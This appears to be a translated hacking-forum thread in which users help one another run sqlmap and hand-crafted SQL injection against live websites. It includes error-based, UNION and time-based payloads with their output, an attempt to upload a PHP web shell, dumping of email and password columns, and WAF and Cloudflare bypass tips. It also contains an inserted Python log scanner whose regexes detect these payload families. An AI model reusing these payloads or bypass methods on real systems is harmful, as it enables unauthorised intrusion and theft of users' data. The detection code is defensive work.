Could someone please advise: I scanned a site with Acunetix and it found a SQL injection, but sqlmap can't get through it, I think because of a WAF. How do I figure out which tamper to use, or how do I extract the information sqlmap needs from Acunetix?
That's not quite how it works. First you need to work the vulnerability out yourself, and only then automate the process with sqlmap. So, to understand which tamper to use, work it out by hand first.
I'm trying to dump data, and for almost an hour now I've been seeing this: [INFO] fetching entries of column(s) 'email,passwort' for table.... with no progress at all. Could it be that sqlmap takes a long time counting the rows if the database is large?
SQLi on Magento at /result/?q=1'. Acunetix found the SQLi and even pulled out the DB name:
Code:
Proof of Exploit
SQL query - SELECT database()
admin8sasdasd
When I send site/result/?q=1' through Burp, the response is:
Code:
HTTP/1.1 503 Service Unavailable
<pre>SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''/result/''q=1'')' at line 1<br />
<strong>Trace:</strong>
<p>Error log record number:
<address class="copyright">Magento is a trademark of Magento Inc. Copyright © 2010 Magento Inc.</address>
But when I try to run it through sqlmap, it doesn't see the SQLi :( I tried --text-only. Is there some tamper for Magento?
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --current-user
Code:
[INFO] retrieved: 'root@localhost'
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --file-write=C:/shell/shell.txt --file-dest=/var/www/shell.php
>> Doesn't write the file, even though the privileges are there
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --sql-shell
select user()
Code:
[INFO] retrieved: 'root@localhost'
select 'test' into outfile '/var/www/test.txt'
Code:
[WARNING] execution of non-query SQL statements is only available when stacked queries are supported
What can I try? Or does into outfile not execute in an error-based injection? load_file works.
The FILE privilege != write permission on the directory. Also, you haven't shown the user's privileges; root@localhost is not necessarily the MySQL root user, but I think you know that. In theory it should work, since union, error and so on differ only in how the data is retrieved, i.e. one and the same query can be union, error, time-based, blind and stacked queries, though that doesn't apply to every query and DBMS. Admittedly I don't quite understand why the first query worked but the second one errors, but oh well. Also, in your case you could try writing the file to other directories, or look for another vector.
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --privileges -U CU
Code:
[23:12:06] [INFO] fetching current user
[23:12:07] [INFO] retrieved: 'root@localhost'
[*] 'root'@'localhost' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
@@secure_file_priv
Code:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select @@secure_file_priv;"
[23:18:45] [INFO] fetching SQL SELECT statement query output: 'select @@secure_file_priv'
[23:18:45] [INFO] resumed: ' '
select @@secure_file_priv: ' '
--technique=E
Code:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=E
[23:21:25] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
--technique=B
Code:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=B
[23:22:31] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
The privileges are all fine; I just can't understand why into outfile doesn't execute.
Well, for a start, you should put a semicolon at the end of those last queries)) though maybe sqlmap doesn't need it, I haven't used it in a while. Also: https://github.com/sqlmapproject/sqlmap/issues/619. In general the error is about stacked queries, and MySQL doesn't have such injections; I don't know, I'd turn verbose up to the maximum and try it by hand. I probably can't help with anything more.
Then I'm powerless here. Either go to another thread or give up)
SELECT user();
qwe' AND EXTRACTVALUE(2410,CONCAT(0x5c,0x716a706a71,(SELECT MID((IFNULL(CAST(user() AS NCHAR),0x20)),1,21)),0x7176627a71)) AND 'Elwc'='Elwc
Code:
General error: 1105 XPATH syntax error: '\qjpjqroot@localhostqvbzq'
SELECT 123 INTO OUTFILE '/tmp/test.txt';
qwe' AND EXTRACTVALUE(4149,CONCAT(0x5c,0x716a706a71,(SELECT MID((IFNULL(CAST(123 INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,21)),0x7176627a71)) AND 'DLgP'='DLgP
Code:
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,21)),0x7176627a71))' at line 1
qwe' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(123 INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,1))>1) THEN 0x617364 ELSE 0x28 END)) AND 'yCEr'='yCEr
Code:
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,1))>1) THEN 0x61736' at line 1
qwe' LIMIT 0,1 INTO OUTFILE '/tmp/test.txt' LINES TERMINATED BY 0x313233-- -
Code:
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'LIMIT 0,1 INTO OUTFILE '/tmp/test.txt' LINES TERMINATED BY 0x313233-- -')' at line 1
IIS / dbms: mssql, boolean-based blind / error-based.
1. With technique=B, --is-dba gives true; with technique=E it gives false. Why?
2. When listing tables (technique=E): [WARNING] the SQL query provided does not return any output (listing the databases works fine). common-tables helps, but since the site is custom-written it only finds 5 tables. How do I get sqlmap to list the tables?
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)
    Payload: cat=-5625) OR 3972=CONCAT(CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (3972=3972) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(98)+CHAR(118)+CHAR(113)) AND (8607=8607
    Vector: OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')
---
[INFO] fetching tables for database: db1
[PAYLOAD] -1789
[PAYLOAD] -6678) OR 4206=CONCAT(CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118)+CHAR(113),(SELECT COUNT(db1..sysusers.name+CHAR(46)+db1..sysobjects.name AS table_name) FROM db1..sysobjects INNER JOIN db1..sysusers ON db1..sysobjects.uid=db1..sysusers.uid WHERE db1..sysobjects.xtype IN (CHAR(117),CHAR(118))),CHAR(113)+CHAR(98)+CHAR(98)+CHAR(118)+CHAR(113)) AND (2349=2349
[WARNING] the SQL query provided does not return any output
It's tough with Cloudflare; there are no publicly available tampers for it. One option is to look for the real IP, which doesn't always work out.
Code:
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://' AND 7389=7389-- qoxM
    Vector: AND [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://' AND (SELECT 9965 FROM (SELECT(SLEEP(5)))umCy)-- CigK
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: http://:80/blog/category/-2990' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a707171,0x565a7070474f77495945716a52566b686252457372674b776e694f6f6877554c4b564f4b6a4c464a,0x716a7a7071)-- -
    Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY]-- -
---
[06:15:30] [INFO] testing MySQL
[06:15:30] [DEBUG] performed 0 queries in 0.02 seconds
[06:15:30] [INFO] confirming MySQL
[06:15:30] [DEBUG] performed 0 queries in 0.00 seconds
[06:15:30] [PAYLOAD] -8917' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a707171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a7071)-- -
[06:15:32] [DEBUG] turning off NATIONAL CHARACTER casting
[06:15:32] [PAYLOAD] -8379' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a707171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a7071)-- -
[06:15:34] [DEBUG] performed 2 queries in 4.32 seconds
[06:15:34] [DEBUG] performed 0 queries in 0.01 seconds
[06:15:34] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[06:15:34] [INFO] fetching tables for database: 'DB'
[06:15:34] [PAYLOAD] -9852' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a707171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_name)),0x716a7a7071) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- -
[06:15:37] [PAYLOAD] -6604' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a707171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- -
[06:15:40] [WARNING] the SQL query provided does not return any output
[06:15:40] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[06:15:40] [PAYLOAD] -6180' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a707171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_name)),0x716a7a7071) FROM mysql.innodb_table_stats WHERE database_name IN (0x70617266756d)-- -
[06:15:43] [PAYLOAD] -8023' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a707171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM mysql.innodb_table_stats WHERE database_name IN (0x70617266756d)-- -
[06:15:45] [WARNING] the SQL query provided does not return any output
[06:15:45] [INFO] fetching number of tables for database 'DB'
[06:15:45] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),1,1))>51-- ZVRv
[06:15:48] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),1,1))>48-- ZVRv
[06:15:51] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),1,1))>9-- ZVRv
[06:15:52] [INFO] retrieved:
[06:15:52] [DEBUG] performed 3 queries in 6.77 seconds
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
[06:15:52] [DEBUG] used the default behavior, running in batch mode
[06:15:52] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),1,1))>51,0,5)))))HoOT)-- oDuA
[06:15:52] [WARNING] time-based comparison requires larger statistical model, please wait..................... (done)
[06:16:00] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[06:16:01] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),1,1))>48,0,5)))))HoOT)-- oDuA
[06:16:01] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[06:16:02] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),1,1))>9,0,5)))))HoOT)-- oDuA
[06:16:03] [INFO] retrieved:
[06:16:03] [DEBUG] performed 3 queries in 11.19 seconds
[06:16:03] [WARNING] unable to retrieve the number of tables for database 'parfum'
[06:16:03] [INFO] fetching number of tables for database 'DB'
[06:16:03] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),1,1))>51-- LERK
[06:16:05] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),1,1))>48-- LERK
[06:16:06] [DEBUG] turning off reflection removal mechanism (for optimization purposes)
[06:16:06] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),1,1))>9-- LERK
[06:16:07] [INFO] retrieved:
[06:16:07] [DEBUG] performed 3 queries in 3.66 seconds
[06:16:07] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),1,1))>51,0,5)))))FEKR)-- xICj
[06:16:08] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),1,1))>48,0,5)))))FEKR)-- xICj
[06:16:09] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),1,1))>9,0,5)))))FEKR)-- xICj
[06:16:10] [INFO] retrieved:
[06:16:10] [DEBUG] performed 3 queries in 3.23 seconds
[06:16:10] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
[06:16:10] [DEBUG] used the default behavior, running in batch mode
No tables found
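As an added defender-side example (not code from the thread or from sqlmap), the following flags the payload families pasted above (UNION with NULL padding, ORD(MID()) inference, SLEEP-based timing, EXTRACTVALUE error extraction, INTO OUTFILE, and sqlmap's 0x71...71 hex delimiters) in combined-format web access logs. The log lines, IPs and family labels are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Payload families visible in the thread's sqlmap output, matched on the
# URL-decoded request path. Labels are ours; the regexes are kept narrow.
SIGNATURES = [
    ("error-based (EXTRACTVALUE/CONCAT)", re.compile(r"EXTRACTVALUE\s*\(\s*\d+\s*,\s*CONCAT\s*\(", re.I)),
    ("time-based (SLEEP)", re.compile(r"\bSLEEP\s*\(\s*\d+", re.I)),
    ("UNION (NULL padding)", re.compile(r"UNION\s+ALL\s+SELECT\s+NULL", re.I)),
    ("boolean-based (ORD(MID()) inference)", re.compile(r"\bORD\s*\(\s*MID\s*\(", re.I)),
    ("file write (INTO OUTFILE)", re.compile(r"\bINTO\s+OUTFILE\b", re.I)),
    ("MSSQL error-based (CHAR()+CHAR())", re.compile(r"CONCAT\s*\(\s*CHAR\s*\(\d+\)\s*\+\s*CHAR\s*\(\d+\)", re.I)),
]
# sqlmap brackets retrieved data with hex delimiters that start and end with 'q' (0x71).
DELIMITER = re.compile(r"0x71[0-9a-f]{6}71", re.I)

# Apache/nginx combined log format: ip ident user [ts] "METHOD path PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(line):
    """Return (ip, decoded_path, [matched families]) for one log line, or None if unparseable."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    decoded = unquote(m.group("path"))  # decode %27, %20 etc. before matching
    hits = [name for name, rx in SIGNATURES if rx.search(decoded)]
    if DELIMITER.search(decoded):
        hits.append("sqlmap delimiter marker")
    return m.group("ip"), decoded, hits

def scan(lines):
    """Aggregate matched families per source IP; IPs with no hits are omitted."""
    report = {}
    for line in lines:
        result = classify(line)
        if result and result[2]:
            report.setdefault(result[0], set()).update(result[2])
    return {ip: sorted(fams) for ip, fams in report.items()}

# Constructed sample log lines (not from the thread), modelled on its payloads.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:06:15:30 +0000] "GET /blog/category/-8917%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x716a707171,(CASE%20WHEN%20(ISNULL(JSON_STORAGE_FREE(NULL)))%20THEN%201%20ELSE%200%20END),0x716a7a7071)--%20- HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:06:15:52 +0000] "GET /blog/category/beauty%27%20AND%20(SELECT%203461%20FROM%20(SELECT(SLEEP(5-(IF(ORD(MID((SELECT%20IFNULL(CAST(COUNT(table_name)%20AS%20CHAR),0x20)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=0x70617266756d),1,1))>51,0,5)))))HoOT)--%20oDuA HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Oct/2023:06:20:01 +0000] "GET /result/?q=qwe%27%20AND%20EXTRACTVALUE(2410,CONCAT(0x5c,0x716a706a71,(SELECT%20MID((IFNULL(CAST(user()%20AS%20NCHAR),0x20)),1,21)),0x7176627a71))%20AND%20%27Elwc%27=%27Elwc HTTP/1.1" 503 1024',
    '192.0.2.9 - - [10/Oct/2023:06:21:13 +0000] "GET /result/?q=beauty HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, fams in scan(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(fams))
```

Run against real logs, the per-IP report is what you would feed into rate limiting or an alert; the 503 on the EXTRACTVALUE request mirrors the verbose MariaDB error the Magento post above shows being returned to the client.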
Code:
[06:15:40] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
Start with this, plus the existing tampers, including the ones for select. Set verbose 3 and watch.
You can use a combination of several tampers at once; also use --prefix="111'/*!40222" --suffix="*/!'". If that doesn't help, identify which WAF it is and, as an option, try to find the site's real IP; if that doesn't work out either, you'll have to write a tamper by hand.
[08:04:48] [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests
How can this be gotten around?
[08:04:48] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[08:06:18] [CRITICAL] connection timed out to the target URL
[08:06:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[08:08:19] [CRITICAL] connection timed out to the target URL
[08:08:19] [INFO] URI parameter '#1*' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable (with --string="write")
[08:08:19] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[08:08:19] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
[08:08:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[08:10:19] [CRITICAL] connection timed out to the target URL
[08:10:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[08:12:19] [CRITICAL] connection timed out to the target URL
[08:12:19] [WARNING] false positive or unexploitable injection point detected
[08:12:19] [WARNING] URI parameter '#1*' does not seem to be injectable
The WAF won't let the SQLi go through.
Good day! For example, I know the DB contains a row with the email [email protected], but I don't know the table and column names because they have random names like "dfdwydponefdxb". How do I search the whole DB and find which table has the record with [email protected]?